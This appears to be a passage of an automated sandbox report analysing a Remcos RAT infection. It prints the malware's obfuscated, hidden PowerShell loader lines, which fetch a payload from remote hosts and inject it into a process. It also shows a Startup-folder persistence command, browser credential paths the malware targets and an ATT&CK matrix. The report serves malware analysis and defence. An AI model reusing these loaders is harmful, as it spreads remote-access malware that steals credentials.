            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\swift 103 202406111301435660 110624-pdf.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.etirenrew.vbs')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jigodkfsawfitgugjypnzfiqjykubmftzvszldexldjdluppaw4njykgkcaoj3unkycwrhunkydybccrjya9ieonkydodwh0dhbzjysnoi8nkycvcmenkyd3lmdpjysndgh1yicrj3vzzscrj3jjb250zw50jysnlicrj2nvjysnbs9ob0rldgvjde8nkydulycrj05vrgv0zscrj2mnkyd0t24vjysncmvmjysncycrjy9ojysnzwenkydkcy9tywlujysnlycrj0rldgfotm8nkyd0ac1wlnr4jysndeonkydodtsgdtbeyicrj2fzzty0q29udgunkydudca9iccrjyhozxctt2jqzscrj2n0ifn5cycrj3rlbs5ozxquv2vijysnq2xpjysnzscrj250kscrjy5eb3dubg9hzfn0jysncicrj2luzyh1meqnkyd1cmwpoyb1mccrj0riascrj25hjysncicrj3ldb250zw50jysnid0gw1n5cycrj3qnkydljysnbs4nkyddbycrj24nkyd2jysnzscrj3inkyd0xscrjzo6ricrj3jvbujhc2u2nfn0cmknkyduzycrjyh1meriyxnljysnnjrdb250zscrj250ktsgjysndscrjzbeyxnzjysnzw1ibhknkycgpsbbumvmbccrj2vjjysndglvbi5bjysnc3nlbwinkydsjysnev0nkyc6okwnkydvyscrj2qnkycojysndtankydeyicrj2lujysnyscrj3j5qycrj29udccrj2vudcknkyc7iftkbmxpyi5jjysntycrjy5ibycrj21lxto6vkenkydjjysnkgq2zzankycvjysntycrj1lvjysnbfgvzc9lzscrjy5ldhnhcc8vonnwjysndhrozccrjzynkydnlcbkjysnnmdkzxnhjysndccrj2l2jysnyscrj2rvzdznjysnlcbkjysnnmcnkydkzscrj3nhdccrj2l2jysnywrvjysnzdynkydnlcankydknmdkzxmnkydhdgl2ywrvzdznjysnlcbkjysnnicrj2dbzgrjjysnbicrj1byjysnb2nlcycrj3mzmicrj2q2zywgzdynkydnzdznjysnlgqnkyc2z2q2jysnzyknks5yrxbsqunlkcd1meqnlcckjykuckvwbefdzsgow2niyvjdnzqrw2niyvjdmta0k1tjsgfsxtexnyksw1nuckluz11by0hhul0zoskuckvwbefdzsgnzdznjyxbu1rysw5nxvtjsgfsxtm0ksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "&((variable '*mdr*').name[3,11,2]-join'') ( ('u'+'0du'+'rl'+' = j'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/nodetecto'+'n/'+'nodete'+'c'+'ton/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'detahno'+'th-v.tx'+'tj'+'hu; u0db'+'ase64conte'+'nt = '+'(new-obje'+'ct sys'+'tem.net.web'+'cli'+'e'+'nt)'+'.downloadst'+'r'+'ing(u0d'+'url); u0'+'dbi'+'na'+'r'+'ycontent'+' = [sys'+'t'+'e'+'m.'+'co'+'n'+'v'+'e'+'r'+'t]'+'::f'+'rombase64stri'+'ng'+'(u0dbase'+'64conte'+'nt); '+'u'+'0dass'+'embly'+' = [refl'+'ec'+'tion.a'+'ssemb'+'l'+'y]'+'::l'+'oa'+'d'+'('+'u0'+'db'+'in'+'a'+'ryc'+'ont'+'ent)'+'; [dnlib.i'+'o'+'.ho'+'me]::va'+'i'+'(d6g0'+'/'+'o'+'yu'+'lx/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gaddi'+'n'+'pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').replace('u0d','$').replace(([char]74+[char]104+[char]117),[string][char]39).replace('d6g',[string][char]34))"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\swift 103 202406111301435660 110624-pdf.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.etirenrew.vbs')')Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jigodkfsawfitgugjypnzfiqjykubmftzvszldexldjdluppaw4njykgkcaoj3unkycwrhunkydybccrjya9ieonkydodwh0dhbzjysnoi8nkycvcmenkyd3lmdpjysndgh1yicrj3vzzscrj3jjb250zw50jysnlicrj2nvjysnbs9ob0rldgvjde8nkydulycrj05vrgv0zscrj2mnkyd0t24vjysncmvmjysncycrjy9ojysnzwenkydkcy9tywlujysnlycrj0rldgfotm8nkyd0ac1wlnr4jysndeonkydodtsgdtbeyicrj2fzzty0q29udgunkydudca9iccrjyhozxctt2jqzscrj2n0ifn5cycrj3rlbs5ozxquv2vijysnq2xpjysnzscrj250kscrjy5eb3dubg9hzfn0jysncicrj2luzyh1meqnkyd1cmwpoyb1mccrj0riascrj25hjysncicrj3ldb250zw50jysnid0gw1n5cycrj3qnkydljysnbs4nkyddbycrj24nkyd2jysnzscrj3inkyd0xscrjzo6ricrj3jvbujhc2u2nfn0cmknkyduzycrjyh1meriyxnljysnnjrdb250zscrj250ktsgjysndscrjzbeyxnzjysnzw1ibhknkycgpsbbumvmbccrj2vjjysndglvbi5bjysnc3nlbwinkydsjysnev0nkyc6okwnkydvyscrj2qnkycojysndtankydeyicrj2lujysnyscrj3j5qycrj29udccrj2vudcknkyc7iftkbmxpyi5jjysntycrjy5ibycrj21lxto6vkenkydjjysnkgq2zzankycvjysntycrj1lvjysnbfgvzc9lzscrjy5ldhnhcc8vonnwjysndhrozccrjzynkydnlcbkjysnnmdkzxnhjysndccrj2l2jysnyscrj2rvzdznjysnlcbkjysnnmcnkydkzscrj3nhdccrj2l2jysnywrvjysnzdynkydnlcankydknmdkzxmnkydhdgl2ywrvzdznjysnlcbkjysnnicrj2dbzgrjjysnbicrj1byjysnb2nlcycrj3mzmicrj2q2zywgzdynkydnzdznjysnlgqnkyc2z2q2jysnzyknks5yrxbsqunlkcd1meqnlcckjykuckvwbefdzsgow2niyvjdnzqrw2niyvjdmta0k1tjsgfsxtexnyksw1nuckluz11by0hhul0zoskuckvwbefdzsgnzdznjyxbu1rysw5nxvtjsgfsxtm0ksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "&((variable '*mdr*').name[3,11,2]-join'') ( ('u'+'0du'+'rl'+' = j'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/nodetecto'+'n/'+'nodete'+'c'+'ton/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'detahno'+'th-v.tx'+'tj'+'hu; u0db'+'ase64conte'+'nt = '+'(new-obje'+'ct sys'+'tem.net.web'+'cli'+'e'+'nt)'+'.downloadst'+'r'+'ing(u0d'+'url); u0'+'dbi'+'na'+'r'+'ycontent'+' = [sys'+'t'+'e'+'m.'+'co'+'n'+'v'+'e'+'r'+'t]'+'::f'+'rombase64stri'+'ng'+'(u0dbase'+'64conte'+'nt); '+'u'+'0dass'+'embly'+' = [refl'+'ec'+'tion.a'+'ssemb'+'l'+'y]'+'::l'+'oa'+'d'+'('+'u0'+'db'+'in'+'a'+'ryc'+'ont'+'ent)'+'; [dnlib.i'+'o'+'.ho'+'me]::va'+'i'+'(d6g0'+'/'+'o'+'yu'+'lx/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gaddi'+'n'+'pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').replace('u0d','$').replace(([char]74+[char]104+[char]117),[string][char]39).replace('d6g',[string][char]34))"Jump to behavior
            Source: AddInProcess32.exe, 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmp, logs.dat.10.drBinary or memory string: [Program Manager]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004329DA cpuid 10_2_004329DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,10_2_0044F17B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,10_2_0044F130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,10_2_0044F216
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_2_0044F2A3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoA,10_2_0040E2BB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,10_2_0044F4F3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_0044F61C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,10_2_0044F723
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_0044F7F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,10_2_00445914
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,10_2_00445E1C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,10_2_0044EEB8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00404F31 GetLocalTime,CreateEventA,CreateThread,10_2_00404F31
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004195F8 GetComputerNameExW,GetUserNameW,10_2_004195F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,10_2_004466BF
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.180e9fef678.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.AddInProcess32.exe.1587080.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3370133817.000000000323F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2350319452.00000180E9BA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7136, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1988, type: MEMORYSTR
            Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
            Contains functionality to steal Chrome passwords or cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data10_2_0040A953
            Contains functionality to steal Firefox passwords or cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\10_2_0040AA71
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \key3.db10_2_0040AA71

            Remote Access Functionality

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.180e9fef678.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.AddInProcess32.exe.1587080.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3370133817.000000000323F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2350319452.00000180E9BA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7136, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1988, type: MEMORYSTR
            Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: cmd.exe10_2_0040567A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts1
            Native API            		221
            Scripting            		1
            DLL Side-Loading            		11
            Deobfuscate/Decode Files or Information            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services11
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		1
            Access Token Manipulation            		3
            Obfuscated Files or Information            		211
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol211
            Input Capture            		12
            Ingress Tool Transfer            		Exfiltration Over Bluetooth1
            Defacement
            Email AddressesDNS ServerDomain Accounts12
            Command and Scripting Interpreter            		1
            Windows Service            		1
            Windows Service            		1
            Software Packing            		2
            Credentials In Files            		1
            System Service Discovery            		SMB/Windows Admin Shares3
            Clipboard Data            		21
            Encrypted Channel            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            Service Execution            		1
            Registry Run Keys / Startup Folder            		422
            Process Injection            		1
            DLL Side-Loading            		NTDS4
            File and Directory Discovery            		Distributed Component Object ModelInput Capture1
            Non-Standard Port            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts3
            PowerShell            		Network Logon Script1
            Registry Run Keys / Startup Folder            		11
            Masquerading            		LSA Secrets43
            System Information Discovery            		SSHKeylogging2
            Non-Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
            Virtualization/Sandbox Evasion            		Cached Domain Credentials31
            Security Software Discovery            		VNCGUI Input Capture23
            Application Layer Protocol            		Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation            		DCSync31
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job422
            Process Injection            		Proc Filesystem3
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
            Application Window Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            System Owner/User Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
            Remote System Discovery            		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging1
